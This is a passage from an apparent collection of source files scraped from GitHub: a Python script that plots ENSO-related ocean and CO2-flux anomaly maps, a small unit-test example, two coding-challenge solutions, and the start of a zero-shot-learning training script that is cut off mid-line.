ax1.plot(x1,y1,marker='x',c='k',markersize=ms)\n \n if title=='SST':\n \n \n meansst=hovmol.mean(dim='time')#.where(co2.seamask==1)\n m.contour(lo1,la1,meansst,levels=[28.5],linestyles='solid',colors='k')\n m.contour(lo1,la1,meansst,levels=[25],linestyles='dashed',colors='k')\n \n \n \n #LETS do a t-test to see if they where there is significant differnces\n \n anom=np.concatenate(hovmol.T)\n mean=np.concatenate(mean.T)\n \n pv=[]\n for i in range(anom.shape[0]):\n #print(xx[i,:])\n stat=ttest_ind(anom[i],mean[i],nan_policy='omit')#linregress(time,xx[i,:])\n #print(stat)\n #tr.append(stat.slope*365)\n pv.append(stat.pvalue)\n \n pv=np.array(pv).reshape(len(hovmol.lon),len(hovmol.lat)).T\n \n hh=hovmol.copy()\n hh=hh.drop('time')\n hh['pval']=(['lat','lon'],pv)\n\n ####No windspeed vectors now\n #pass\n\n \n\n # if title=='Wind divergence': \n # windFmt = matplotlib.ticker.ScalarFormatter(useMathText=True)\n # windFmt.set_powerlimits((0, 0))\n # cnt=m.contourf(lo1,la1,hh.pval,colors='none',hatches=['.'],levels=[0,0.05])\n # #Quick anti-aliasing fix as per: https://stackoverflow.com/questions/15822159/aliasing-when-saving-matplotlib-filled-contour-plot-to-pdf-or-eps\n # for c in cnt.collections:\n # c.set_edgecolor(\"face\")\n # elif title=='Wind divergence and direction': \n\n if title=='Wind speed and direction':\n\n lo2,la2=np.meshgrid(wu.lon.values,wu.lat.values)\n lo2a,la2a=m(lo2,la2)\n \n skip=(slice(None,None,5),slice(None,None,5)) #2 for NCEP 2\n qu=m.quiver(lo2a[skip],\n la2a[skip],\n (wu.mean(dim='time')-wu_all.mean(dim='time'))[skip],\n (wv.mean(dim='time')-wv_all.mean(dim='time'))[skip],\n scale=17,headaxislength=4,headlength=5,headwidth=5)\n #x,y=m(-10,150)\n #ax1.quiverkey(qu,label='Wind direction 
m/s',labelpos='S',U=1,X=150,Y=-10)\n if axn!=6:\n plt.quiverkey(qu,1.3,1.028,U=1,label='Wind speed 5m s$^{-1}$')\n \n else:\n #windFmt=None\n cnt=m.contourf(lo1,la1,hh.pval,colors='none',hatches=['.'],levels=[0,0.05])\n #Quick anti-aliasing fix as per: https://stackoverflow.com/questions/15822159/aliasing-when-saving-matplotlib-filled-contour-plot-to-pdf-or-eps\n for c in cnt.collections:\n c.set_edgecolor(\"face\")\n\n\n \n cb=plt.colorbar(f,ax=ax1,fraction=fr,extend='both')\n\n cb.set_label(units,fontsize=fs)\n cb.ax.tick_params(labelsize=fs-1)\n\n \n if axn==1:\n name='EP Events'\n elif axn==2:\n name='CP Events'\n elif axn==3:\n name='La Nina Events'\n if axn<=3:\n ax1.set_title(name+'\\n'+chr(ord('`')+axn)+') Anomaly: '+title,fontsize=fs)\n else:\n ax1.set_title(chr(ord('`')+axn)+') Anomaly: '+title,fontsize=fs)\n \n ax1.tick_params(labelsize=fs)\n\n #Trends\n \n #hovmol=hovmol.where(hovmol!=-0.9999,np.nan)\n #hm=hovmol.interpolate_na(dim='time').sel(time=slice(startday,endday))\n #months=hm.time\n \n #dt_dates=pd.to_numeric(months.values.astype('datetime64[D]'))\n #num_dates=dt_dates\n #hm['time']=num_dates\n\n \n\n\n \n\n\n#Functions above make plotting easy.\n# # Code begins\n \n# %%Load data in\n \n#landsch_fp='datasets/co2/landschutzer_co2/spco2_MPI_SOM-FFN_v2018.nc'\nlandsch_fp='datasets/co2/landschutzer_co2/spco2_MPI-SOM_FFN_v2020.nc'\n\n\n\nseamask=xr.open_dataset('processed/seamask.nc') #Because 2020 version doesn't have it.\nseamask= seamask.assign_coords(lon=(seamask.lon % 360)).roll(lon=(seamask.dims['lon']),roll_coords=False).sortby('lon')\t\n\n#It would be preferable to use the 2020 version,\n# landsch_fp='datasets/co2/landschutzer_co2/spco2_MPI-SOM_FFN_v2020.nc'\n#However it doesn't include seamask so we are going to need both.... 
(Unless I save the seamask)\nlandschutzer=xr.open_dataset(landsch_fp)\nlandschutzer= landschutzer.assign_coords(lon=(landschutzer.lon % 360)).roll(lon=(landschutzer.dims['lon']),roll_coords=False).sortby('lon')\t\t#EPIC 1 line fix for the dateline problem.\nland_pac=landschutzer.sel(lon=slice(120,290),lat=slice(-20,20))\nland_pac['time']=land_pac.time.astype('datetime64[M]')\nland_pac_all=landschutzer.sel(lon=slice(120,290),lat=slice(-20,20))\n\nland_pac=land_pac.fgco2_smoothed\n\natmco2=land_pac_all.atm_co2\ndco2=land_pac_all.dco2\npco2=land_pac_all.spco2_smoothed\nkw=land_pac_all.kw\n\nf_ratios=xr.open_mfdataset('processed/flux/fratios.nc')\nratio=f_ratios.laws2011a#laws2000#laws2000,laws2011a,laws2011b,henson2011\n\nnpp1=xr.open_dataset('processed/flux/avg_npp_rg_cafe.nc')\navg_npp=(npp1.avg_npp/12)*ratio\n\nland=(land_pac*1000)/365 #LANDSCHUTZ\n\n\ndiff=land-avg_npp\ndiff1=diff.where((diff<0.1)|(diff<-0.1),np.nan)\n\n\n# Need to combine the chlorophyll products, takes a bit of memory.\nchl=xr.open_dataset('processed/flux/tpca.nc').tpca#'sw_month.nc')\n\n#mod=xr.open_dataset('datasets/tpca/mod_month.nc')\nchl['time']=chl.time.astype('datetime64[M]')\nchl=chl.interpolate_na(dim='time')\n#mod['time']=mod.time.astype('datetime64[M]')\n#tpca=sw\n#tpca=tpca.merge(mod)\n#chl = tpca.to_array(dim='tpca').mean('tpca')\n\n#SST\nsst = xr.open_dataset('datasets/sst/sst.mnmean.nc')\nsst= sst.assign_coords(lon=(sst.lon % 360)).roll(lon=(sst.dims['lon']),roll_coords=False).sortby('lon')\t\t#EPIC 1 line fix for the dateline problem.\nsst=sst.sel(lon=slice(120,290),lat=slice(20,-20)).sst\nsst=sst.where(seamask.seamask==1)\n\npCO2 = xr.open_dataarray('processed/flux/pco2grams.nc') #_norm\nintegratedpCO2 = (pCO2*12*50)\n\n#NCEP2 winds\n#wu=xr.open_dataset('datasets/uwnd.10m.mon.mean.nc').sel(level=10).uwnd\n#wv=xr.open_dataset('datasets/vwnd.10m.mon.mean.nc').sel(level=10).vwnd\n#ws=np.sqrt((wu**2)+(wv**2))\n#ws=ws.sel(lat=slice(20,-20),lon=slice(120,290),time=slice('1997-07-01','2020-01-01'))\n\nws_ccmp=xr.open_dataset('processed/CCMP_ws_1deg_global.nc')\nwu=ws_ccmp.uwnd\nwv=ws_ccmp.vwnd\n\n# %% Test Horizontal Divergence\n#w = VectorWind(wu, wv)\n#spd = w.magnitude()\n#divergence = w.divergence().sel(lat=slice(20,-20),lon=slice(120,290),time=slice('1997-07-01','2020-01-01'))\n#div.mean(dim='time').plot()\n\nwu=wu.sel(lat=slice(-20,20),lon=slice(120,290),time=slice('1997-07-01','2020-01-01'))\nwv=wv.sel(lat=slice(-20,20),lon=slice(120,290),time=slice('1997-07-01','2020-01-01'))\n\n\n\n# # THIS NEEDS TO BE RUN ONCE BUT CAN be memory intensive. In own file. 
\n\n# w_ccmp_a=xr.open_mfdataset('datasets/ws_ccmp/*.nc') #Downloaded manually\n# w_ccmp_a['time']=w_ccmp_a.time.astype('datetime64[M]')\n# w_ccmp_a=w_ccmp_a.sel(latitude=slice(-20,20))\n\n# w_ccmp_b=xr.open_mfdataset('datasets/CCMP_winds.nc') #Bulk ErDap download\n# dt=w_ccmp_b.indexes['time'].to_datetimeindex()\n# w_ccmp_b['time']=dt\n\n# w_ccmp=xr.merge([w_ccmp_b,w_ccmp_a])\n\n\n# w_ccmp=w_ccmp.sel(longitude=slice(120,290),latitude=slice(-20,20))\n# ws_ccmp=np.sqrt((w_ccmp.uwnd**2)+(w_ccmp.vwnd**2))\n# ws_ccmp=ws_ccmp.rename({'latitude':'lat','longitude':'lon'})\n# try:\n# ws_ccmp.to_netcdf('datasets/CCMP_windspeed.nc')\n# print('saved')\n# except:\n# pass\n\n#ws_ccmp=xr.open_dataarray('processed/CCMP_ws_1deg.nc')\n\n# %% Prepare Figure \n\n\nlanina=pd.read_csv('processed/indexes/la_nina_events.csv')\ncp_nino=pd.read_csv('processed/indexes/cp_events.csv')\nep_nino=pd.read_csv('processed/indexes/ep_events.csv')\n\nfp='processed/combined_dataset/month_data_exports.nc'\ninfo=xr.open_mfdataset(fp).sel(Mooring=195).to_dataframe()\n\n\n#Process EP, CP and Nino events.\nnina=pd.DataFrame()\nep=pd.DataFrame()\ncp=pd.DataFrame()\nfor i in lanina.iterrows(): nina=nina.append(info[slice(i[1].start,i[1].end)])\nfor i in ep_nino.iterrows(): ep=ep.append(info[slice(i[1].start,i[1].end)])\nfor i in cp_nino.iterrows(): cp=cp.append(info[slice(i[1].start,i[1].end)])\nnina_dates=nina.index\nep_dates=ep.index[4:]\ncp_dates=cp.index\n#all_dates=chl.time\nall_dates=info.index[8:]#[36:] #2000 - 2020\nold_all_dates=all_dates\nneutral=all_dates.drop(cp_dates).drop(nina_dates).drop(ep_dates)\nall_dates=neutral\nfig=plt.figure(figsize=(19*2/2.54,23*2/2.54))#(figsize=(30,15))\nsb1=7\nsb2=3\n\n\nsst_range=np.arange(-2.5,2.75,0.25)\nws_range=np.arange(-2,2.2,0.2)\nchl_range=np.arange(-0.1,0.11,0.01)\nnpp_range=np.arange(-2.75,3,0.25)#None#np.arange(-0.04,0.0425,0.0025)\nprecip_range=np.arange(-6,7,1)\ndco2_range=np.arange(-45,50,5)\nco2_range=npp_range#None#np.arange(-0.04,0.045,0.005)\n\n\n\n#%% EP\n\n\n\n\nplot_basemap_row(fig,axn=1,\n hovmol=sst.sel(time=ep_dates,method='nearest'),\n mean=sst.sel(time=all_dates,method='nearest'),\n units='Degrees C',\n title='SST',\n levs=sst_range,\n \n cmap='RdBu_r')\n\n\n\nplot_basemap_row(fig,axn=4,\n hovmol=ws_ccmp.wspd.sel(time=ep_dates,method='nearest'),\n mean=ws_ccmp.wspd.sel(time=all_dates,method='nearest'),\n units='m s$^{-1}$',\n title='Wind speed and direction', \n levs=ws_range, \n wu=wu.sel(time=ep_dates,method='nearest'),\n wv=wv.sel(time=ep_dates,method='nearest'),\n wv_all=wv.sel(time=all_dates,method='nearest'),\n wu_all=wu.sel(time=all_dates,method='nearest'),\n cmap='RdBu_r')\n\n# plot_basemap_row(fig,axn=7,\n# hovmol=divergence.sel(time=ep_dates,method='nearest'),\n# mean=divergence.sel(time=all_dates,method='nearest'),\n# units='m s$^{-1}$',\n# title='Wind divergence', \n# levs=np.arange(-6*10**-6,6.1*10**-6,0.5*10**-6),\n# wu=wu.sel(time=ep_dates,method='nearest'),\n# wv=wv.sel(time=ep_dates,method='nearest'),\n# wv_all=wv.sel(time=all_dates,method='nearest'),\n# wu_all=wu.sel(time=all_dates,method='nearest'),\n# cmap='RdBu_r')\n\n\nplot_basemap_row(fig,axn=7,\n hovmol=chl.sel(time=ep_dates,method='nearest'),\n mean=chl.sel(time=all_dates,method='nearest'),\n units='mg chl m$^{-3}$',\n title='TPCA chlorophyll',\n levs=chl_range,\n \n trend_conversion=1000,\n cmap='RdBu_r')\n\n\nplot_basemap_row(fig,axn=10,\n hovmol=avg_npp.sel(lat=slice(-15,15)).sel(time=ep_dates,method='nearest'),\n 
mean=avg_npp.sel(lat=slice(-15,15)).sel(time=all_dates,method='nearest'),\n units='mmol C m$^{-2}$ day$^{-1}$',\n title='New production',\n \n levs=npp_range,\n \n #trend_conversion=1000,\n cmap='RdBu_r')\n\n# plot_basemap_row(fig,axn=13,\n# hovmol=precip.sel(time=ep_dates,method='nearest'),\n# mean=precip.sel(time=all_dates,method='nearest'),\n# units='mm day$^{-1}$',\n# title='Precipitation',\n \n# levs=precip_range,\n\n# cmap='RdBu_r')\n\n\n#Delta pCO2\nh=plot_basemap_row(fig,axn=13,\n hovmol=dco2.sel(time=ep_dates,method='nearest'),#npp1.avg_npp,#dco2,#integratedpCO2,#monthlyPCO2*1000,\n mean=dco2.sel(time=all_dates,method='nearest'),\n units='μatm',\n title='\\u0394pCO$_{2}$',#'pCO21',\n \n levs=dco2_range,#(200,1200,10),#(5.5,9.5,0.5),\n \n cmap='RdBu_r')\n\nplot_basemap_row(fig,axn=16,\n hovmol=land.sel(time=ep_dates,method='nearest'),\n mean=land.sel(time=all_dates,method='nearest'),\n units='mmol C m$^{-2}$ day$^{-1}$',\n title='Air-sea CO$_{2}$ flux',\n \n levs=co2_range,\n\n cmap='RdBu_r')\n\n\n# %% CP\n\nplot_basemap_row(fig,axn=2,\n hovmol=sst.sel(time=cp_dates,method='nearest'),\n mean=sst.sel(time=all_dates,method='nearest'),\n units='Degrees C',\n title='SST',\n levs=sst_range,#np.arange(20,32,1),\n \n cmap='RdBu_r')\n\n\nplot_basemap_row(fig,axn=5,\n hovmol=ws_ccmp.wspd.sel(time=cp_dates,method='nearest'),\n mean=ws_ccmp.wspd.sel(time=all_dates,method='nearest'),\n units='m s$^{-1}$',\n title='Wind speed and direction', \n levs=ws_range,#p.arange(0,11,1),\n wu=wu.sel(time=cp_dates,method='nearest'),\n wv=wv.sel(time=cp_dates,method='nearest'),\n wv_all=wv.sel(time=all_dates,method='nearest'),\n wu_all=wu.sel(time=all_dates,method='nearest'),\n cmap='RdBu_r')\n\n\n# plot_basemap_row(fig,axn=8,\n# hovmol=divergence.sel(time=cp_dates,method='nearest'),\n# mean=divergence.sel(time=all_dates,method='nearest'),\n# units='m s$^{-1}$',\n# title='Wind divergence', \n# levs=np.arange(-6*10**-6,6.1*10**-6,0.5*10**-6),##p.arange(0,11,1),\n# wu=wu.sel(time=cp_dates,method='nearest'),\n# wv=wv.sel(time=cp_dates,method='nearest'),\n# wv_all=wv.sel(time=all_dates,method='nearest'),\n# wu_all=wu.sel(time=all_dates,method='nearest'),\n# cmap='RdBu_r')\n\n\nplot_basemap_row(fig,axn=8,\n hovmol=chl.sel(time=cp_dates,method='nearest'),\n mean=chl.sel(time=all_dates,method='nearest'),\n units='mg chl m$^{-3}$',\n title='TPCA chlorophyll',\n levs=chl_range,\n \n cmap='RdBu_r')\n\n\nplot_basemap_row(fig,axn=11,\n hovmol=avg_npp.sel(lat=slice(-15,15)).sel(time=cp_dates,method='nearest'),\n mean=avg_npp.sel(lat=slice(-15,15)).sel(time=all_dates,method='nearest'),\n units='mmol C m$^{-2}$ day$^{-1}$',\n title='New production',\n levs=npp_range,\n\n cmap='RdBu_r')\n\n# plot_basemap_row(fig,axn=14,\n# hovmol=precip.sel(time=cp_dates,method='nearest'),\n# mean=precip.sel(time=all_dates,method='nearest'),\n# units='mm day$^{-1}$',\n# title='Precipitation',\n# levs=precip_range,\n\n# cmap='RdBu_r')\n\n\n#Delta pCO2\nh=plot_basemap_row(fig,axn=14,\n hovmol=dco2.sel(time=cp_dates,method='nearest'),#npp1.avg_npp,#dco2,#integratedpCO2,#monthlyPCO2*1000,\n mean=dco2.sel(time=all_dates,method='nearest'),\n units='μatm',\n title='\\u0394pCO$_{2}$',#'pCO21',\n levs=dco2_range,\n\n cmap='RdBu_r')\n\nplot_basemap_row(fig,axn=17,\n hovmol=land.sel(time=cp_dates,method='nearest'),\n mean=land.sel(time=all_dates,method='nearest'),\n units='mmol C m$^{-2}$ day$^{-1}$',\n title='Air-sea CO$_{2}$ flux',\n levs=co2_range,\n \n cmap='RdBu_r')\n\n\n#%% NINA\n\n\nplot_basemap_row(fig,axn=3,\n 
hovmol=sst.sel(time=nina_dates,method='nearest'),\n mean=sst.sel(time=all_dates,method='nearest'),\n units='Degrees C',\n title='SST',\n levs=sst_range,\n cmap='RdBu_r')\n\n\nplot_basemap_row(fig,axn=6,\n hovmol=ws_ccmp.wspd.sel(time=nina_dates,method='nearest'),\n mean=ws_ccmp.wspd.sel(time=all_dates,method='nearest'),\n units='m s$^{-1}$',\n title='Wind speed and direction',\n wu=wu.sel(time=nina_dates,method='nearest'),\n wv=wv.sel(time=nina_dates,method='nearest'),\n wv_all=wv.sel(time=all_dates,method='nearest'),\n wu_all=wu.sel(time=all_dates,method='nearest'),\n levs=ws_range,\n cmap='RdBu_r')\n\n\n# plot_basemap_row(fig,axn=9,\n# hovmol=divergence.sel(time=nina_dates,method='nearest'),\n# mean=divergence.sel(time=all_dates,method='nearest'),\n# units='m s$^{-1}$',\n# title='Wind divergence',\n# wu=wu.sel(time=nina_dates,method='nearest'),\n# wv=wv.sel(time=nina_dates,method='nearest'),\n# wv_all=wv.sel(time=all_dates,method='nearest'),\n# wu_all=wu.sel(time=all_dates,method='nearest'),\n# levs=np.arange(-6*10**-6,6.1*10**-6,0.5*10**-6),\n# cmap='RdBu_r')\n\n\nplot_basemap_row(fig,axn=9,\n hovmol=chl.sel(time=nina_dates,method='nearest'),\n mean=chl.sel(time=all_dates,method='nearest'),\n units='mg chl m$^{-3}$',\n title='TPCA chlorophyll',\n levs=chl_range,\n cmap='RdBu_r')\n\n\nplot_basemap_row(fig,axn=12,\n hovmol=avg_npp.sel(lat=slice(-15,15)).sel(time=nina_dates,method='nearest'),\n mean=avg_npp.sel(lat=slice(-15,15)).sel(time=all_dates,method='nearest'),\n units='mmol C m$^{-2}$ day$^{-1}$',\n title='New production',\n levs=npp_range,\n\n cmap='RdBu_r')\n\n# plot_basemap_row(fig,axn=15,\n# hovmol=precip.sel(time=nina_dates,method='nearest'),\n# mean=precip.sel(time=all_dates,method='nearest'),\n# units='mm day$^{-1}$',\n# title='Precipitation',\n \n# levs=precip_range,\n\n# cmap='RdBu_r')\n\n\n#Delta pCO2\nh=plot_basemap_row(fig,axn=15,\n hovmol=dco2.sel(time=nina_dates,method='nearest'),#npp1.avg_npp,#dco2,#integratedpCO2,#monthlyPCO2*1000,\n mean=dco2.sel(time=all_dates,method='nearest'),\n units='μatm',\n title='\\u0394pCO$_{2}$',#'pCO21',\n levs=dco2_range,\n \n cmap='RdBu_r')\n\nplot_basemap_row(fig,axn=18,\n hovmol=land.sel(time=nina_dates,method='nearest'),\n mean=land.sel(time=all_dates,method='nearest'),\n units='mmol C m$^{-2}$ day$^{-1}$',\n title='Air-sea CO$_{2}$ flux',\n levs=co2_range,\n\n cmap='RdBu_r')\n\n\n\n\n\nplt.tight_layout()\nplt.savefig('figs/Figure4.png',dpi=300)\nplt.savefig('figs/vector/Figure4.eps')\nplt.savefig('figs/vector/Figure4.pdf')\nplt.show()\n\ntry:\n plt.savefig('figs/Figure4.jpeg',dpi=300)\nexcept:\n pass\nplt.show()\n\n\n# Check correlation between new prod and sst\n# %%\nev=[ep_dates,cp_dates,nina_dates,info.index,neutral]\nfor e in ev:\n sst_corr=sst.sel(time=e,method='nearest').sel(time=slice(np.datetime64('1997-09-01'),np.datetime64('2020-01-01')))#.mean(dim='time')-sst.sel(time=all_dates,method='nearest').mean(dim='time')\n avg_npp_corr=avg_npp.sel(time=e,method='nearest').sel(lat=slice(-15,15))#.mean(dim='time')-avg_npp.sel(time=all_dates,method='nearest').mean(dim='time')).sel(lat=slice(-15,15))\n\n startday=np.datetime64('2000-01-01')\n endday=np.datetime64('2020-01-01') \n \n sst_corr=sst_corr.sel(time=slice(startday,endday))\n avg_npp_corr=avg_npp_corr.sel(time=slice(startday,endday))\n \n c=xr.corr(sst_corr,avg_npp_corr,dim='time').mean().values\n 
print(c)","repo_name":"nicpittman/tropical_pacific_carbon_export","sub_path":"9d_ENSO_anomaly_spatial_maps.py","file_name":"9d_ENSO_anomaly_spatial_maps.py","file_ext":"py","file_size_in_byte":24644,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"28485159280","text":"def getShowBasedOnChannel(channel, showTitles):\n \"\"\"Checks which show is available for the user's channel.\n\n Args:\n channel (string): The channel the user has access to.\n showTitles (dict): A dictionary of available show to channel pairs. \n\n Returns:\n String: Returns the show available for the user's \n channel; returns None if no show is available. \n \"\"\"\n res = None\n for key in showTitles:\n if showTitles[key] == channel:\n return key\n return res\n\ndef genericUnitTest(test_func, desired_input_1, desired_input_2, desired_output):\n \"\"\"A generic unit test to test a function, in this case one that \n takes two args, like getShowBasedOnChannel. It asserts True if \n the expected output of the function matches the actual, and False\n otherwise. It also records any exception encountered.\n\n Args:\n test_func (function): the two-argument function to be tested\n desired_input_1 (_type_): in this case, the user channel availability\n desired_input_2 (_type_): in this case, the show title of the show the user intends to watch\n desired_output (_type_): the expected return value of test_func\n \"\"\"\n \n print(\"Testing \" + test_func.__name__)\n print(\"Input:\")\n print(\"\\t (Param 1): \" + str(desired_input_1) + \", \\n\\t (Param 2): \", desired_input_2)\n print(\"Expected output:\", desired_output)\n print(\"Actual output: \", (test_func(desired_input_1, desired_input_2),))\n try:\n assert desired_output == (test_func(desired_input_1, desired_input_2),)\n except Exception as name:\n print(\"\\nUNIT TEST RESULTS:\")\n print(\"TEST FAILED. 
The following exception has occurred: \" + type(name).__name__)\n\n\n#TEST CASES\nshowsAndChannel1 = (\"WeirdTV\", {\"Money Heist\": \"SpanishTV\", \"Stranger Things\": \"ScaryTV\"})\ntup = (None,)\ngenericUnitTest(getShowBasedOnChannel, *showsAndChannel1, tup)\n\nprint(\"\\n\")\n\nshowsAndChannel2 = (\"ScaryTV\", {\"Money Heist\": \"SpanishTV\", \"Stranger Things\": \"ScaryTV\"})\ntup = (\"Stranger Things\",)\ngenericUnitTest(getShowBasedOnChannel, *showsAndChannel2, tup)\n","repo_name":"Romani20/weekly-6-my-repo","sub_path":"unit_test.py","file_name":"unit_test.py","file_ext":"py","file_size_in_byte":2131,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"73111444963","text":"# https://school.programmers.co.kr/learn/courses/30/lessons/12927\n\nimport heapq\n\n\ndef solution(n, works):\n answer = 0\n heap = []\n for work in works:\n heapq.heappush(heap, -work)\n\n for i in range(n):\n heapq.heappush(heap, heapq.heappop(heap) + 1)\n\n for h in heap:\n if h < 0:\n answer += h**2\n\n return answer\n","repo_name":"unh6uoj/coding_test","sub_path":"Programmers/level3/야근 지수.py","file_name":"야근 지수.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"37671807865","text":"# Zinc 2018\r\n# TheaterTickets: Given an array A, count the number of different triplets (a, b, c) in which a occurs before b and b occurs before c.\r\n\r\ndef theaterTickets(A):\r\n combinations = {}\r\n combinationsOfOne = 0\r\n combinationsOfTwo = 0\r\n combinationsOfThree = 0\r\n length = len(A)\r\n for i in range(length):\r\n currentCombinationsOfTwo = combinationsOfOne\r\n if A[i] not in combinations:\r\n combinations[A[i]] = [0,0]\r\n combinationsOfOne += 1\r\n currentCombinationsOfThree = combinationsOfTwo\r\n combinationsOfTwo += currentCombinationsOfTwo - combinations[A[i]][0]\r\n combinations[A[i]][0] = currentCombinationsOfTwo\r\n combinationsOfThree += currentCombinationsOfThree - combinations[A[i]][1]\r\n combinations[A[i]][1] = currentCombinationsOfThree\r\n combinationsOfThree %= 1000000007\r\n return combinationsOfThree\r\n pass\r\n\r\n# [1, 2, 1, 1] = 3\r\nprint(\"[1, 2, 1, 1], the number of different triplets (a,b,c) in which a occurs before b and b occurs before c is\", str(theaterTickets([1, 2, 1, 1])))\r\n# [1, 2, 3, 4] = 4\r\nprint(\"[1, 2, 3, 4], the number of different triplets (a,b,c) in which a occurs before b and b occurs before c is\", str(theaterTickets([1, 2, 3, 4])))\r\n# [2, 2, 2, 2] = 1\r\nprint(\"[2, 2, 2, 2], the number of different triplets (a,b,c) in which a occurs before b and b occurs before c is\", str(theaterTickets([2, 2, 2, 2])))\r\n# [2, 2, 1, 2, 2] = 4\r\nprint(\"[2, 2, 1, 2, 2], the number of different triplets (a,b,c) in which a occurs before b and b occurs before c is\", str(theaterTickets([2, 2, 1, 2, 2])))\r\n","repo_name":"va64doman/codility","sub_path":"Challenges/zinc2018.py","file_name":"zinc2018.py","file_ext":"py","file_size_in_byte":1619,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"35978183745","text":"\"\"\"\nPart of code is from Kai Li \"kailigo\". 
The gitub website is https://github.com/kailigo/cvcZSL.\nWe add virtual classes and IAS in the code.\n\"\"\"\nfrom scipy import io\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nfrom torch.nn import functional as F\nfrom torch.optim import lr_scheduler\nimport torch.utils.data as data\nfrom sklearn.metrics import accuracy_score\nfrom tensorboardX import SummaryWriter\n\nfrom utils import ReDirectSTD\nfrom unseen_data_loader import data_loader_virtualCls\nfrom unseen_option import Options\n\nimport os\nimport random\nimport pickle\n# from test_embeded import test_while_training_simple\n\nTMP = 10\n\nargs = Options().parse()\nmodel_file_name = './chk/' + args.model_file\nsummaryFolder = './summary/' + args.log_file\nif not os.path.exists(summaryFolder):\n os.mkdir(summaryFolder)\nwriter = SummaryWriter(summaryFolder)\nprint(args)\n\ndef init_seeds(seed=0):\n random.seed(seed)\n np.random.seed(seed)\n\n # torch cuda\n torch.cuda.empty_cache()\n torch.manual_seed(seed)\n torch.cuda.manual_seed(seed)\n torch.cuda.manual_seed_all(seed)\n\ninit_seeds(520)\ndef calc_accuracy(test_visual, test_label, attM, test_id, test_id_seen_unseen,cossim=False): \n outpred = [0] * test_visual.shape[0] \n end = 0\n outpred_list = []\n zslpred_list = []\n score_n_list = []\n for j in range(0,len(test_visual),64):\n if j+64>len(test_visual):\n end = len(test_visual)\n else:\n end = j+64\n all_cls_weights = forward(attM,test_visual[j:end],tmp=TMP) \n score,score_n=apply_classification_weights(test_visual[j:end].cuda(), \n all_cls_weights,norm=True)\n score = score.squeeze(0)\n score_n = score_n.squeeze(0)\n \n _, pred = score.max(dim=1)\n pred = pred.view(-1)\n select_test_label = test_label[j:end].view(-1)\n\n outpred_list.extend(test_id[pred.cpu().detach().numpy()])\n zslpred_list.extend([ i in test_id_seen_unseen for i in test_id[pred.cpu().detach().numpy()]])\n score_n_list.extend(score_n.cpu().detach().numpy())\n\n seen_unseen_acc = accuracy_score(np.ones(len(zslpred_list)),zslpred_list)\n \n outpred = np.array(outpred_list, dtype='int')\n score_n = np.array(score_n_list)\n test_label = test_label.numpy()\n unique_labels = np.unique(test_label)\n acc = 0\n acc_cls = {}\n preds_cls = {}\n cos_cls = {}\n for l in unique_labels:\n idx = np.nonzero(test_label == l)[0]\n acc_cls[l] = accuracy_score(test_label[idx],outpred[idx])\n try:\n preds_cls[l].extend(list(outpred[idx])) \n except(KeyError):\n preds_cls[l] = list(outpred[idx])\n\n acc += acc_cls[l]\n loc = test_label == l\n outpred_l = outpred[idx]\n score_n_l = score_n[idx]\n loc = outpred_l == l\n\n if cossim:\n cos_c = score_n_l[loc,l]\n try:\n cos_cls[l].extend(cos_c)\n except(KeyError):\n cos_cls[l] = [cos_c]\n acc = acc / unique_labels.shape[0]\n\n return acc,seen_unseen_acc,acc_cls,cos_cls,preds_cls\n\n\ndef compute_accuracy_all(test_att, att_all, test_visual_unseen, test_id_unseen, test_label_unseen,\n test_visual_seen, test_id_all, test_label_seen,train_id):\n\n acc_zsl,_,unseenacc_cls,_,unseenpred_cls = calc_accuracy(test_visual_unseen, test_label_unseen, test_att, test_id_unseen,test_id_unseen)\n acc_seenAcc,_,seenacc_cls,_,_ = calc_accuracy(test_visual_seen, test_label_seen, att_all, train_id, train_id)\n\n att_all_cls = torch.cat((att_all, test_att))\n \n acc_gzsl_unseen,Ru,unseengeneralAcc_cls,unseenCos_cls,_ = calc_accuracy(test_visual_unseen, test_label_unseen, att_all_cls, test_id_all,test_id_unseen,cossim=True)\n \n acc_gzsl_seen,Rs,seengeneralAcc_cls,seenCos_cls,_ = 
calc_accuracy(test_visual_seen, test_label_seen, att_all_cls, test_id_all,train_id,cossim=True) \n acc_cls = {**unseenacc_cls,**seenacc_cls}\n generalAcc_cls = {**unseengeneralAcc_cls,**seengeneralAcc_cls}\n H = 2 * acc_gzsl_seen * acc_gzsl_unseen / (acc_gzsl_seen + acc_gzsl_unseen)\n\n return acc_zsl, acc_seenAcc, acc_gzsl_unseen, acc_gzsl_seen, H, Rs, Ru, acc_cls, generalAcc_cls,unseenCos_cls,seenCos_cls,unseenpred_cls\n\n\ndef apply_classification_weights(features, cls_weights,norm=False):\n\n features = F.normalize(features,dim=-1)\n cls_weights = F.normalize(cls_weights, p=2, dim=-1, eps=1e-12) \n\n cls_scores = scale_cls * (torch.matmul(cls_weights,features.t()))\n cls_scores = cls_scores.permute(0,2,1)\n cls_scores = torch.diagonal(cls_scores,offset=0,dim1=0,dim2=1)\n cls_scores = cls_scores.t()\n if norm:\n return cls_scores,cls_scores/scale_cls\n else:\n return cls_scores\n\n\ndef IASatt(features,AttM,tmp):\n cls_num = len(AttM)\n attdims = AttM.shape[1]\n atten = torch.mm(features,w_IAS)+b_IAS\n atten = F.softmax(atten/tmp,dim=1).reshape(-1,1,attdims)\n atten = atten.reshape(-1,1,attdims)\n atten = atten + torch.ones_like(atten)\n atten = atten.repeat(1,cls_num,1)\n AttM = AttM.unsqueeze(0)\n AttM = AttM.repeat(len(features),1,1)\n AttM = atten*AttM\n return AttM\n\ndef forward(att,features,tmp):\n features = features.squeeze()\n att = IASatt(features,att,tmp)\n\n a1 = F.relu(torch.matmul(att, w1) + b1)\n a2 = F.relu(torch.matmul(a1, w2) + b2)\n\n return a2\n\ndataroot = './dataset/xlsa/'\nimage_embedding = 'res101' \nclass_embedding = 'att'\ndataset = args.dataset\nmatcontent = io.loadmat(dataroot + \"/\" + dataset + \"/\" + image_embedding + \".mat\")\n\nfeature = matcontent['features'].T\nlabel = matcontent['labels'].astype(int).squeeze() - 1\nmatcontent = io.loadmat(dataroot + \"/\" + dataset + \"/\" + class_embedding + \"_splits.mat\")\n\ntrainvalloc = 